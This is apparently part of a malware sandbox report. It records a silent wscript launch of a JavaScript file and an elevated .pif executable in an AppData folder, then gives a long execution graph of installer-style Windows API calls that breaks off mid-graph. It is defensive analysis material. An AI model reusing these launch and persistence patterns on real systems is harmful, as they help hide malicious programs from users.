                                            Target ID:14
                                            Start time:11:58:07
                                            Start date:17/06/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.js"
                                            Imagebase:0x7ff7312a0000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:15
                                            Start time:11:58:07
                                            Start date:17/06/2024
                                            Path:C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pif
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\TechMind360 Innovations Co\MindTechPro360.pif" "C:\Users\user\AppData\Local\TechMind360 Innovations Co\L"
                                            Imagebase:0x690000
                                            File size:937'776 bytes
                                            MD5 hash:B06E67F9767E5023892D9698703AD098
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 0%, ReversingLabs
                                            Has exited:false

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:12.7%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:16.7%
                                              Total number of Nodes:1392
                                              Total number of Limit Nodes:19
                                              execution_graph 3223 4015c1 3243 402d3e 3223->3243 3227 401631 3229 401663 3227->3229 3230 401636 3227->3230 3233 401423 24 API calls 3229->3233 3259 401423 3230->3259 3241 40165b 3233->3241 3237 40164a SetCurrentDirectoryW 3237->3241 3238 4015d1 3238->3227 3239 4015fa 3238->3239 3240 401617 GetFileAttributesW 3238->3240 3255 405e3e 3238->3255 3263 405b0d 3238->3263 3271 405af0 CreateDirectoryW 3238->3271 3239->3238 3266 405a73 CreateDirectoryW 3239->3266 3240->3238 3244 402d4a 3243->3244 3274 406579 3244->3274 3247 4015c8 3249 405ebc CharNextW CharNextW 3247->3249 3250 405ed9 3249->3250 3253 405eeb 3249->3253 3252 405ee6 CharNextW 3250->3252 3250->3253 3251 405f0f 3251->3238 3252->3251 3253->3251 3254 405e3e CharNextW 3253->3254 3254->3253 3256 405e44 3255->3256 3257 405e5a 3256->3257 3258 405e4b CharNextW 3256->3258 3257->3238 3258->3256 3312 4055a4 3259->3312 3262 40653c lstrcpynW 3262->3237 3323 406931 GetModuleHandleA 3263->3323 3267 405ac0 3266->3267 3268 405ac4 GetLastError 3266->3268 3267->3239 3268->3267 3269 405ad3 SetFileSecurityW 3268->3269 3269->3267 3270 405ae9 GetLastError 3269->3270 3270->3267 3272 405b00 3271->3272 3273 405b04 GetLastError 3271->3273 3272->3238 3273->3272 3278 406586 3274->3278 3275 4067d1 3276 402d6b 3275->3276 3307 40653c lstrcpynW 3275->3307 3276->3247 3291 4067eb 3276->3291 3278->3275 3279 40679f lstrlenW 3278->3279 3281 406579 10 API calls 3278->3281 3284 4066b4 GetSystemDirectoryW 3278->3284 3285 4066c7 GetWindowsDirectoryW 3278->3285 3286 4067eb 5 API calls 3278->3286 3287 406579 10 API calls 3278->3287 3288 406742 lstrcatW 3278->3288 3289 4066fb SHGetSpecialFolderLocation 3278->3289 3300 40640a 3278->3300 3305 406483 wsprintfW 3278->3305 3306 40653c lstrcpynW 3278->3306 3279->3278 3281->3279 3284->3278 3285->3278 3286->3278 3287->3278 3288->3278 3289->3278 3290 406713 SHGetPathFromIDListW CoTaskMemFree 3289->3290 3290->3278 3298 4067f8 3291->3298 3292 40686e 3293 406873 CharPrevW 3292->3293 3295 406894 3292->3295 3293->3292 3294 406861 CharNextW 3294->3292 3294->3298 3295->3247 3296 405e3e CharNextW 3296->3298 3297 40684d CharNextW 3297->3298 3298->3292 3298->3294 3298->3296 3298->3297 3299 40685c CharNextW 3298->3299 3299->3294 3308 4063a9 3300->3308 3303 40646e 3303->3278 3304 40643e RegQueryValueExW RegCloseKey 3304->3303 3305->3278 3306->3278 3307->3276 3309 4063b8 3308->3309 3310 4063c1 RegOpenKeyExW 3309->3310 3311 4063bc 3309->3311 3310->3311 3311->3303 3311->3304 3313 4055bf 3312->3313 3321 401431 3312->3321 3314 4055db lstrlenW 3313->3314 3315 406579 17 API calls 3313->3315 3316 405604 3314->3316 3317 4055e9 lstrlenW 3314->3317 3315->3314 3319 405617 3316->3319 3320 40560a SetWindowTextW 3316->3320 3318 4055fb lstrcatW 3317->3318 3317->3321 3318->3316 3319->3321 3322 40561d SendMessageW SendMessageW SendMessageW 3319->3322 3320->3319 3321->3262 3322->3321 3324 406957 GetProcAddress 3323->3324 3325 40694d 3323->3325 3326 405b14 3324->3326 3329 4068c1 GetSystemDirectoryW 3325->3329 3326->3238 3328 406953 3328->3324 3328->3326 3330 4068e3 wsprintfW LoadLibraryExW 3329->3330 3330->3328 3868 402a42 3882 402d1c 3868->3882 3870 402a48 3871 402a88 3870->3871 3872 402a6f 3870->3872 3878 402925 3870->3878 3875 402aa2 3871->3875 3876 402a92 3871->3876 3873 402a74 3872->3873 3874 402a85 3872->3874 3885 40653c lstrcpynW 3873->3885 3886 406483 wsprintfW 3874->3886 3879 406579 17 API calls 3875->3879 3877 402d1c 17 API calls 3876->3877 3877->3878 3879->3878 3883 406579 17 API calls 3882->3883 3884 402d31 3883->3884 3884->3870 3885->3878 3886->3878 3887 401c43 3888 402d1c 17 API calls 3887->3888 3889 401c4a 3888->3889 3890 402d1c 17 API calls 3889->3890 3891 401c57 3890->3891 3892 401c6c 3891->3892 3894 402d3e 17 API calls 3891->3894 3893 401c7c 3892->3893 3895 402d3e 17 API calls 3892->3895 3896 401cd3 3893->3896 3897 401c87 3893->3897 3894->3892 3895->3893 3899 402d3e 17 API calls 3896->3899 3898 402d1c 17 API calls 3897->3898 3900 401c8c 3898->3900 3901 401cd8 3899->3901 3903 402d1c 17 API calls 3900->3903 3902 402d3e 17 API calls 3901->3902 3904 401ce1 FindWindowExW 3902->3904 3905 401c98 3903->3905 3908 401d03 3904->3908 3906 401cc3 SendMessageW 3905->3906 3907 401ca5 SendMessageTimeoutW 3905->3907 3906->3908 3907->3908 3909 402b43 3910 406931 5 API calls 3909->3910 3911 402b4a 3910->3911 3912 402d3e 17 API calls 3911->3912 3913 402b53 3912->3913 3914 402b57 IIDFromString 3913->3914 3916 402b8e 3913->3916 3915 402b66 3914->3915 3914->3916 3915->3916 3919 40653c lstrcpynW 3915->3919 3918 402b83 CoTaskMemFree 3918->3916 3919->3918 3920 402947 3921 402d3e 17 API calls 3920->3921 3922 402955 3921->3922 3923 40296b 3922->3923 3924 402d3e 17 API calls 3922->3924 3925 40600d 2 API calls 3923->3925 3924->3923 3926 402971 3925->3926 3948 406032 GetFileAttributesW CreateFileW 3926->3948 3928 40297e 3929 402a21 3928->3929 3930 40298a GlobalAlloc 3928->3930 3933 402a29 DeleteFileW 3929->3933 3934 402a3c 3929->3934 3931 4029a3 3930->3931 3932 402a18 CloseHandle 3930->3932 3949 403590 SetFilePointer 3931->3949 3932->3929 3933->3934 3936 4029a9 3937 40357a ReadFile 3936->3937 3938 4029b2 GlobalAlloc 3937->3938 3939 4029c2 3938->3939 3940 4029f6 3938->3940 3941 403309 44 API calls 3939->3941 3942 4060e4 WriteFile 3940->3942 3947 4029cf 3941->3947 3943 402a02 GlobalFree 3942->3943 3944 403309 44 API calls 3943->3944 3945 402a15 3944->3945 3945->3932 3946 4029ed GlobalFree 3946->3940 3947->3946 3948->3928 3949->3936 3950 4045c8 lstrcpynW lstrlenW 3951 403bc9 3952 403bd4 3951->3952 3953 403bd8 3952->3953 3954 403bdb GlobalAlloc 3952->3954 3954->3953 3958 4016cc 3959 402d3e 17 API calls 3958->3959 3960 4016d2 GetFullPathNameW 3959->3960 3961 40170e 3960->3961 3962 4016ec 3960->3962 3963 402bc2 3961->3963 3964 401723 GetShortPathNameW 3961->3964 3962->3961 3965 40689a 2 API calls 3962->3965 3964->3963 3966 4016fe 3965->3966 3966->3961 3968 40653c lstrcpynW 3966->3968 3968->3961 3969 401e4e GetDC 3970 402d1c 17 API calls 3969->3970 3971 401e60 GetDeviceCaps MulDiv ReleaseDC 3970->3971 3972 402d1c 17 API calls 3971->3972 3973 401e91 3972->3973 3974 406579 17 API calls 3973->3974 3975 401ece CreateFontIndirectW 3974->3975 3976 402630 3975->3976 3984 402acf 3985 402d1c 17 API calls 3984->3985 3986 402ad5 3985->3986 3987 402925 3986->3987 3988 402b12 3986->3988 3990 402ae7 3986->3990 3988->3987 3989 406579 17 API calls 3988->3989 3989->3987 3990->3987 3992 406483 wsprintfW 3990->3992 3992->3987 3993 4020d0 3994 4020e2 3993->3994 4004 402194 3993->4004 3995 402d3e 17 API calls 3994->3995 3997 4020e9 3995->3997 3996 401423 24 API calls 4000 4022ee 3996->4000 3998 402d3e 17 API calls 3997->3998 3999 4020f2 3998->3999 4001 402108 LoadLibraryExW 3999->4001 4002 4020fa GetModuleHandleW 3999->4002 4003 402119 4001->4003 4001->4004 4002->4001 4002->4003 4013 4069a0 4003->4013 4004->3996 4007 402163 4009 4055a4 24 API calls 4007->4009 4008 40212a 4010 401423 24 API calls 4008->4010 4011 40213a 4008->4011 4009->4011 4010->4011 4011->4000 4012 402186 FreeLibrary 4011->4012 4012->4000 4018 40655e WideCharToMultiByte 4013->4018 4015 4069bd 4016 4069c4 GetProcAddress 4015->4016 4017 402124 4015->4017 4016->4017 4017->4007 4017->4008 4018->4015 4019 404651 4020 404669 4019->4020 4023 404783 4019->4023 4050 404492 4020->4050 4021 4047ed 4022 4047f7 GetDlgItem 4021->4022 4025 4048b7 4021->4025 4026 404811 4022->4026 4027 404878 4022->4027 4023->4021 4023->4025 4028 4047be GetDlgItem SendMessageW 4023->4028 4062 4044f9 4025->4062 4026->4027 4031 404837 SendMessageW LoadCursorW SetCursor 4026->4031 4027->4025 4032 40488a 4027->4032 4055 4044b4 EnableWindow 4028->4055 4029 4046d0 4034 404492 18 API calls 4029->4034 4059 404900 4031->4059 4037 4048a0 4032->4037 4038 404890 SendMessageW 4032->4038 4040 4046dd CheckDlgButton 4034->4040 4035 4048b2 4037->4035 4042 4048a6 SendMessageW 4037->4042 4038->4037 4039 4047e8 4056 4048dc 4039->4056 4053 4044b4 EnableWindow 4040->4053 4042->4035 4045 4046fb GetDlgItem 4054 4044c7 SendMessageW 4045->4054 4047 404711 SendMessageW 4048 404737 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4047->4048 4049 40472e GetSysColor 4047->4049 4048->4035 4049->4048 4051 406579 17 API calls 4050->4051 4052 40449d SetDlgItemTextW 4051->4052 4052->4029 4053->4045 4054->4047 4055->4039 4057 4048ea 4056->4057 4058 4048ef SendMessageW 4056->4058 4057->4058 4058->4021 4076 405b68 ShellExecuteExW 4059->4076 4061 404866 LoadCursorW SetCursor 4061->4027 4063 4045bc 4062->4063 4064 404511 GetWindowLongW 4062->4064 4063->4035 4064->4063 4065 404526 4064->4065 4065->4063 4066 404553 GetSysColor 4065->4066 4067 404556 4065->4067 4066->4067 4068 404566 SetBkMode 4067->4068 4069 40455c SetTextColor 4067->4069 4070 404584 4068->4070 4071 40457e GetSysColor 4068->4071 4069->4068 4072 404595 4070->4072 4073 40458b SetBkColor 4070->4073 4071->4070 4072->4063 4074 4045a8 DeleteObject 4072->4074 4075 4045af CreateBrushIndirect 4072->4075 4073->4072 4074->4075 4075->4063 4076->4061 4077 4028d5 4078 4028dd 4077->4078 4079 4028e1 FindNextFileW 4078->4079 4081 4028f3 4078->4081 4080 40293a 4079->4080 4079->4081 4083 40653c lstrcpynW 4080->4083 4083->4081 4084 401956 4085 402d3e 17 API calls 4084->4085 4086 40195d lstrlenW 4085->4086 4087 402630 4086->4087 4088 4014d7 4089 402d1c 17 API calls 4088->4089 4090 4014dd Sleep 4089->4090 4092 402bc2 4090->4092 3359 4035d8 SetErrorMode GetVersion 3360 403617 3359->3360 3361 40361d 3359->3361 3362 406931 5 API calls 3360->3362 3363 4068c1 3 API calls 3361->3363 3362->3361 3364 403633 lstrlenA 3363->3364 3364->3361 3365 403643 3364->3365 3366 406931 5 API calls 3365->3366 3367 40364a 3366->3367 3368 406931 5 API calls 3367->3368 3369 403651 3368->3369 3370 406931 5 API calls 3369->3370 3371 40365d #17 OleInitialize SHGetFileInfoW 3370->3371 3449 40653c lstrcpynW 3371->3449 3374 4036a9 GetCommandLineW 3450 40653c lstrcpynW 3374->3450 3376 4036bb 3377 405e3e CharNextW 3376->3377 3378 4036e0 CharNextW 3377->3378 3379 40380a GetTempPathW 3378->3379 3387 4036f9 3378->3387 3451 4035a7 3379->3451 3381 403822 3382 403826 GetWindowsDirectoryW lstrcatW 3381->3382 3383 40387c DeleteFileW 3381->3383 3384 4035a7 12 API calls 3382->3384 3461 403068 GetTickCount GetModuleFileNameW 3383->3461 3388 403842 3384->3388 3385 405e3e CharNextW 3385->3387 3387->3385 3394 4037f5 3387->3394 3396 4037f3 3387->3396 3388->3383 3390 403846 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3388->3390 3389 403890 3391 403947 ExitProcess OleUninitialize 3389->3391 3402 405e3e CharNextW 3389->3402 3433 403933 3389->3433 3395 4035a7 12 API calls 3390->3395 3392 403a7d 3391->3392 3393 40395d 3391->3393 3398 403b01 ExitProcess 3392->3398 3399 403a85 GetCurrentProcess OpenProcessToken 3392->3399 3566 405ba2 3393->3566 3548 40653c lstrcpynW 3394->3548 3400 403874 3395->3400 3396->3379 3407 403ad1 3399->3407 3408 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 3399->3408 3400->3383 3400->3391 3413 4038af 3402->3413 3409 406931 5 API calls 3407->3409 3408->3407 3412 403ad8 3409->3412 3410 403973 3414 405b0d 5 API calls 3410->3414 3411 40390d 3549 405f19 3411->3549 3416 403aed ExitWindowsEx 3412->3416 3417 403afa 3412->3417 3413->3410 3413->3411 3418 403978 lstrcatW 3414->3418 3416->3398 3416->3417 3579 40140b 3417->3579 3421 403994 lstrcatW lstrcmpiW 3418->3421 3422 403989 lstrcatW 3418->3422 3421->3391 3423 4039b0 3421->3423 3422->3421 3425 4039b5 3423->3425 3426 4039bc 3423->3426 3428 405a73 4 API calls 3425->3428 3430 405af0 2 API calls 3426->3430 3427 403928 3565 40653c lstrcpynW 3427->3565 3432 4039ba 3428->3432 3431 4039c1 SetCurrentDirectoryW 3430->3431 3434 4039d1 3431->3434 3435 4039dc 3431->3435 3432->3431 3491 403c0b 3433->3491 3570 40653c lstrcpynW 3434->3570 3571 40653c lstrcpynW 3435->3571 3438 406579 17 API calls 3439 403a1b DeleteFileW 3438->3439 3440 403a28 CopyFileW 3439->3440 3446 4039ea 3439->3446 3440->3446 3441 403a71 3442 406302 36 API calls 3441->3442 3444 403a78 3442->3444 3444->3391 3445 406579 17 API calls 3445->3446 3446->3438 3446->3441 3446->3445 3448 403a5c CloseHandle 3446->3448 3572 406302 MoveFileExW 3446->3572 3576 405b25 CreateProcessW 3446->3576 3448->3446 3449->3374 3450->3376 3452 4067eb 5 API calls 3451->3452 3453 4035b3 3452->3453 3454 4035bd 3453->3454 3582 405e11 lstrlenW CharPrevW 3453->3582 3454->3381 3457 405af0 2 API calls 3458 4035cb 3457->3458 3585 406061 3458->3585 3589 406032 GetFileAttributesW CreateFileW 3461->3589 3463 4030ab 3490 4030b8 3463->3490 3590 40653c lstrcpynW 3463->3590 3465 4030ce 3591 405e5d lstrlenW 3465->3591 3469 4030df GetFileSize 3470 4030f6 3469->3470 3485 4031d9 3469->3485 3477 403276 3470->3477 3484 402fc6 32 API calls 3470->3484 3470->3485 3470->3490 3627 40357a 3470->3627 3474 40321e GlobalAlloc 3475 403235 3474->3475 3480 406061 2 API calls 3475->3480 3478 402fc6 32 API calls 3477->3478 3478->3490 3479 4031ff 3481 40357a ReadFile 3479->3481 3482 403246 CreateFileW 3480->3482 3483 40320a 3481->3483 3486 403280 3482->3486 3482->3490 3483->3474 3483->3490 3484->3470 3596 402fc6 3485->3596 3611 403590 SetFilePointer 3486->3611 3488 40328e 3612 403309 3488->3612 3490->3389 3492 406931 5 API calls 3491->3492 3493 403c1f 3492->3493 3494 403c25 GetUserDefaultUILanguage 3493->3494 3495 403c37 3493->3495 3659 406483 wsprintfW 3494->3659 3497 40640a 3 API calls 3495->3497 3499 403c67 3497->3499 3498 403c35 3660 403ee1 3498->3660 3500 403c86 lstrcatW 3499->3500 3501 40640a 3 API calls 3499->3501 3500->3498 3501->3500 3504 405f19 18 API calls 3505 403cb8 3504->3505 3506 403d4c 3505->3506 3508 40640a 3 API calls 3505->3508 3507 405f19 18 API calls 3506->3507 3509 403d52 3507->3509 3510 403cea 3508->3510 3511 403d62 LoadImageW 3509->3511 3512 406579 17 API calls 3509->3512 3510->3506 3515 403d0b lstrlenW 3510->3515 3519 405e3e CharNextW 3510->3519 3513 403e08 3511->3513 3514 403d89 RegisterClassW 3511->3514 3512->3511 3518 40140b 2 API calls 3513->3518 3516 403943 3514->3516 3517 403dbf SystemParametersInfoW CreateWindowExW 3514->3517 3520 403d19 lstrcmpiW 3515->3520 3521 403d3f 3515->3521 3516->3391 3517->3513 3522 403e0e 3518->3522 3524 403d08 3519->3524 3520->3521 3525 403d29 GetFileAttributesW 3520->3525 3523 405e11 3 API calls 3521->3523 3522->3516 3526 403ee1 18 API calls 3522->3526 3527 403d45 3523->3527 3524->3515 3528 403d35 3525->3528 3530 403e1f 3526->3530 3668 40653c lstrcpynW 3527->3668 3528->3521 3529 405e5d 2 API calls 3528->3529 3529->3521 3532 403e2b ShowWindow 3530->3532 3533 403eae 3530->3533 3535 4068c1 3 API calls 3532->3535 3669 405677 OleInitialize 3533->3669 3540 403e43 3535->3540 3536 403eb4 3537 403ed0 3536->3537 3538 403eb8 3536->3538 3541 40140b 2 API calls 3537->3541 3538->3516 3545 40140b 2 API calls 3538->3545 3539 403e51 GetClassInfoW 3543 403e65 GetClassInfoW RegisterClassW 3539->3543 3544 403e7b DialogBoxParamW 3539->3544 3540->3539 3542 4068c1 3 API calls 3540->3542 3541->3516 3542->3539 3543->3544 3546 40140b 2 API calls 3544->3546 3545->3516 3547 403ea3 3546->3547 3547->3516 3548->3396 3687 40653c lstrcpynW 3549->3687 3551 405f2a 3552 405ebc 4 API calls 3551->3552 3553 405f30 3552->3553 3554 403919 3553->3554 3555 4067eb 5 API calls 3553->3555 3554->3391 3564 40653c lstrcpynW 3554->3564 3556 405f40 3555->3556 3556->3554 3561 405f57 3556->3561 3557 405f71 lstrlenW 3558 405f7c 3557->3558 3557->3561 3560 405e11 3 API calls 3558->3560 3562 405f81 GetFileAttributesW 3560->3562 3561->3554 3561->3557 3563 405e5d 2 API calls 3561->3563 3688 40689a FindFirstFileW 3561->3688 3562->3554 3563->3557 3564->3427 3565->3433 3567 405bb7 3566->3567 3568 405bcb MessageBoxIndirectW 3567->3568 3569 40396b ExitProcess 3567->3569 3568->3569 3570->3435 3571->3446 3573 406316 3572->3573 3575 406323 3572->3575 3691 406188 3573->3691 3575->3446 3577 405b64 3576->3577 3578 405b58 CloseHandle 3576->3578 3577->3446 3578->3577 3580 401389 2 API calls 3579->3580 3581 401420 3580->3581 3581->3398 3583 4035c5 3582->3583 3584 405e2d lstrcatW 3582->3584 3583->3457 3584->3583 3586 40606e GetTickCount GetTempFileNameW 3585->3586 3587 4060a4 3586->3587 3588 4035d6 3586->3588 3587->3586 3587->3588 3588->3381 3589->3463 3590->3465 3592 405e6b 3591->3592 3593 405e71 CharPrevW 3592->3593 3594 4030d4 3592->3594 3593->3592 3593->3594 3595 40653c lstrcpynW 3594->3595 3595->3469 3597 402fd7 3596->3597 3598 402fef 3596->3598 3601 402fe0 DestroyWindow 3597->3601 3602 402fe7 3597->3602 3599 402ff7 3598->3599 3600 402fff GetTickCount 3598->3600 3603 40696d 2 API calls 3599->3603 3600->3602 3604 40300d 3600->3604 3601->3602 3602->3474 3602->3490 3630 403590 SetFilePointer 3602->3630 3603->3602 3605 403042 CreateDialogParamW ShowWindow 3604->3605 3606 403015 3604->3606 3605->3602 3606->3602 3631 402faa 3606->3631 3608 403023 wsprintfW 3609 4055a4 24 API calls 3608->3609 3610 403040 3609->3610 3610->3602 3611->3488 3613 403334 3612->3613 3614 403318 SetFilePointer 3612->3614 3634 403411 GetTickCount 3613->3634 3614->3613 3617 4033d1 3617->3490 3620 403411 42 API calls 3621 40336b 3620->3621 3621->3617 3622 4033d7 ReadFile 3621->3622 3624 40337a 3621->3624 3622->3617 3624->3617 3625 4060b5 ReadFile 3624->3625 3649 4060e4 WriteFile 3624->3649 3625->3624 3628 4060b5 ReadFile 3627->3628 3629 40358d 3628->3629 3629->3470 3630->3479 3632 402fb9 3631->3632 3633 402fbb MulDiv 3631->3633 3632->3633 3633->3608 3635 403569 3634->3635 3636 40343f 3634->3636 3637 402fc6 32 API calls 3635->3637 3651 403590 SetFilePointer 3636->3651 3639 40333b 3637->3639 3639->3617 3647 4060b5 ReadFile 3639->3647 3640 40344a SetFilePointer 3645 40346f 3640->3645 3641 40357a ReadFile 3641->3645 3643 402fc6 32 API calls 3643->3645 3644 4060e4 WriteFile 3644->3645 3645->3639 3645->3641 3645->3643 3645->3644 3646 40354a SetFilePointer 3645->3646 3652 406aac 3645->3652 3646->3635 3648 403354 3647->3648 3648->3617 3648->3620 3650 406102 3649->3650 3650->3624 3651->3640 3653 406ad1 3652->3653 3656 406ad9 3652->3656 3653->3645 3654 406b60 GlobalFree 3655 406b69 GlobalAlloc 3654->3655 3655->3653 3655->3656 3656->3653 3656->3654 3656->3655 3657 406be0 GlobalAlloc 3656->3657 3658 406bd7 GlobalFree 3656->3658 3657->3653 3657->3656 3658->3657 3659->3498 3661 403ef5 3660->3661 3676 406483 wsprintfW 3661->3676 3663 403f66 3677 403f9a 3663->3677 3665 403c96 3665->3504 3666 403f6b 3666->3665 3667 406579 17 API calls 3666->3667 3667->3666 3668->3506 3680 4044de 3669->3680 3671 40569a 3675 4056c1 3671->3675 3683 401389 3671->3683 3672 4044de SendMessageW 3673 4056d3 OleUninitialize 3672->3673 3673->3536 3675->3672 3676->3663 3678 406579 17 API calls 3677->3678 3679 403fa8 SetWindowTextW 3678->3679 3679->3666 3681 4044f6 3680->3681 3682 4044e7 SendMessageW 3680->3682 3681->3671 3682->3681 3685 401390 3683->3685 3684 4013fe 3684->3671 3685->3684 3686 4013cb MulDiv SendMessageW 3685->3686 3686->3685 3687->3551 3689 4068b0 FindClose 3688->3689 3690 4068bb 3688->3690 3689->3690 3690->3561 3692 4061b8 3691->3692 3693 4061de GetShortPathNameW 3691->3693 3718 406032 GetFileAttributesW CreateFileW 3692->3718 3695 4061f3 3693->3695 3696 4062fd 3693->3696 3695->3696 3698 4061fb wsprintfA 3695->3698 3696->3575 3697 4061c2 CloseHandle GetShortPathNameW 3697->3696 3699 4061d6 3697->3699 3700 406579 17 API calls 3698->3700 3699->3693 3699->3696 3701 406223 3700->3701 3719 406032 GetFileAttributesW CreateFileW 3701->3719 3703 406230 3703->3696 3704 40623f GetFileSize GlobalAlloc 3703->3704 3705 406261 3704->3705 3706 4062f6 CloseHandle 3704->3706 3707 4060b5 ReadFile 3705->3707 3706->3696 3708 406269 3707->3708 3708->3706 3720 405f97 lstrlenA 3708->3720 3711 406280 lstrcpyA 3714 4062a2 3711->3714 3712 406294 3713 405f97 4 API calls 3712->3713 3713->3714 3715 4062d9 SetFilePointer 3714->3715 3716 4060e4 WriteFile 3715->3716 3717 4062ef GlobalFree 3716->3717 3717->3706 3718->3697 3719->3703 3721 405fd8 lstrlenA 3720->3721 3722 405fe0 3721->3722 3723 405fb1 lstrcmpiA 3721->3723 3722->3711 3722->3712 3723->3722 3724 405fcf CharNextA 3723->3724 3724->3721 4093 404cd9 4094 404d05 4093->4094 4095 404ce9 4093->4095 4097 404d38 4094->4097 4098 404d0b SHGetPathFromIDListW 4094->4098 4104 405b86 GetDlgItemTextW 4095->4104 4100 404d22 SendMessageW 4098->4100 4101 404d1b 4098->4101 4099 404cf6 SendMessageW 4099->4094 4100->4097 4103 40140b 2 API calls 4101->4103 4103->4100 4104->4099 4105 406c5b 4106 406adf 4105->4106 4107 40744a 4106->4107 4108 406b60 GlobalFree 4106->4108 4109 406b69 GlobalAlloc 4106->4109 4110 406be0 GlobalAlloc 4106->4110 4111 406bd7 GlobalFree 4106->4111 4108->4109 4109->4106 4109->4107 4110->4106 4110->4107 4111->4110 3814 40175c 3815 402d3e 17 API calls 3814->3815 3816 401763 3815->3816 3817 406061 2 API calls 3816->3817 3818 40176a 3817->3818 3819 406061 2 API calls 3818->3819 3819->3818 4112 401d5d 4113 402d1c 17 API calls 4112->4113 4114 401d6e SetWindowLongW 4113->4114 4115 402bc2 4114->4115 4116 401ede 4117 402d1c 17 API calls 4116->4117 4118 401ee4 4117->4118 4119 402d1c 17 API calls 4118->4119 4120 401ef0 4119->4120 4121 401f07 EnableWindow 4120->4121 4122 401efc ShowWindow 4120->4122 4123 402bc2 4121->4123 4122->4123 4124 401563 4125 402b08 4124->4125 4128 406483 wsprintfW 4125->4128 4127 402b0d 4128->4127 4129 4056e3 4130 405704 GetDlgItem GetDlgItem GetDlgItem 4129->4130 4131 40588d 4129->4131 4174 4044c7 SendMessageW 4130->4174 4133 405896 GetDlgItem CreateThread CloseHandle 4131->4133 4134 4058be 4131->4134 4133->4134 4136 4058e9 4134->4136 4138 4058d5 ShowWindow ShowWindow 4134->4138 4139 40590e 4134->4139 4135 405774 4144 40577b GetClientRect GetSystemMetrics SendMessageW SendMessageW 4135->4144 4137 405949 4136->4137 4141 405923 ShowWindow 4136->4141 4142 4058fd 4136->4142 4137->4139 4151 405957 SendMessageW 4137->4151 4176 4044c7 SendMessageW 4138->4176 4143 4044f9 8 API calls 4139->4143 4147 405943 4141->4147 4148 405935 4141->4148 4177 40446b 4142->4177 4146 40591c 4143->4146 4149 4057e9 4144->4149 4150 4057cd SendMessageW SendMessageW 4144->4150 4156 40446b SendMessageW 4147->4156 4155 4055a4 24 API calls 4148->4155 4152 4057fc 4149->4152 4153 4057ee SendMessageW 4149->4153 4150->4149 4151->4146 4154 405970 CreatePopupMenu 4151->4154 4158 404492 18 API calls 4152->4158 4153->4152 4157 406579 17 API calls 4154->4157 4155->4147 4156->4137 4159 405980 AppendMenuW 4157->4159 4160 40580c 4158->4160 4161 4059b0 TrackPopupMenu 4159->4161 4162 40599d GetWindowRect 4159->4162 4163 405815 ShowWindow 4160->4163 4164 405849 GetDlgItem SendMessageW 4160->4164 4161->4146 4165 4059cb 4161->4165 4162->4161 4166 405838 4163->4166 4167 40582b ShowWindow 4163->4167 4164->4146 4168 405870 SendMessageW SendMessageW 4164->4168 4169 4059e7 SendMessageW 4165->4169 4175 4044c7 SendMessageW 4166->4175 4167->4166 4168->4146 4169->4169 4170 405a04 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4169->4170 4172 405a29 SendMessageW 4170->4172 4172->4172 4173 405a52 GlobalUnlock SetClipboardData CloseClipboard 4172->4173 4173->4146 4174->4135 4175->4164 4176->4136 4178 404472 4177->4178 4179 404478 SendMessageW 4177->4179 4178->4179 4179->4139 4187 4026e4 4188 402d1c 17 API calls 4187->4188 4195 4026f3 4188->4195 4189 40273d ReadFile 4189->4195 4199 402830 4189->4199 4190 4060b5 ReadFile 4190->4195 4192 402832 4209 406483 wsprintfW 4192->4209 4193 40277d MultiByteToWideChar 4193->4195 4195->4189 4195->4190 4195->4192 4195->4193 4196 4027a3 SetFilePointer MultiByteToWideChar 4195->4196 4197 402843 4195->4197 4195->4199 4200 406113 SetFilePointer 4195->4200 4196->4195 4198 402864 SetFilePointer 4197->4198 4197->4199 4198->4199 4201 40612f 4200->4201 4203 406147 4200->4203 4202 4060b5 ReadFile 4201->4202 4204 40613b 4202->4204 4203->4195 4204->4203 4205 406150 SetFilePointer 4204->4205 4206 406178 SetFilePointer 4204->4206 4205->4206 4207 40615b 4205->4207 4206->4203 4208 4060e4 WriteFile 4207->4208 4208->4203 4209->4199 4210 401968 4211 402d1c 17 API calls 4210->4211 4212 40196f 4211->4212 4213 402d1c 17 API calls 4212->4213 4214 40197c 4213->4214 4215 402d3e 17 API calls 4214->4215 4216 401993 lstrlenW 4215->4216 4217 4019a4 4216->4217 4218 4019e5 4217->4218 4222 40653c lstrcpynW 4217->4222 4220 4019d5 4220->4218 4221 4019da lstrlenW 4220->4221 4221->4218 4222->4220 4223 40166a 4224 402d3e 17 API calls 4223->4224 4225 401670 4224->4225 4226 40689a 2 API calls 4225->4226 4227 401676 4226->4227 4228 4023ec 4229 402d3e 17 API calls 4228->4229 4230 4023fb 4229->4230 4231 402d3e 17 API calls 4230->4231 4232 402404 4231->4232 4233 402d3e 17 API calls 4232->4233 4234 40240e GetPrivateProfileStringW 4233->4234 3820 40176f 3821 402d3e 17 API calls 3820->3821 3822 401776 3821->3822 3823 401796 3822->3823 3824 40179e 3822->3824 3860 40653c lstrcpynW 3823->3860 3861 40653c lstrcpynW 3824->3861 3827 40179c 3831 4067eb 5 API calls 3827->3831 3828 4017a9 3829 405e11 3 API calls 3828->3829 3830 4017af lstrcatW 3829->3830 3830->3827 3837 4017bb 3831->3837 3832 4017c1 3833 40689a 2 API calls 3832->3833 3836 4017cd CompareFileTime 3832->3836 3832->3837 3833->3832 3834 40600d 2 API calls 3834->3837 3836->3832 3837->3832 3837->3834 3838 40188d 3837->3838 3841 40653c lstrcpynW 3837->3841 3847 406579 17 API calls 3837->3847 3853 405ba2 MessageBoxIndirectW 3837->3853 3856 401864 3837->3856 3859 406032 GetFileAttributesW CreateFileW 3837->3859 3839 4055a4 24 API calls 3838->3839 3842 401897 3839->3842 3840 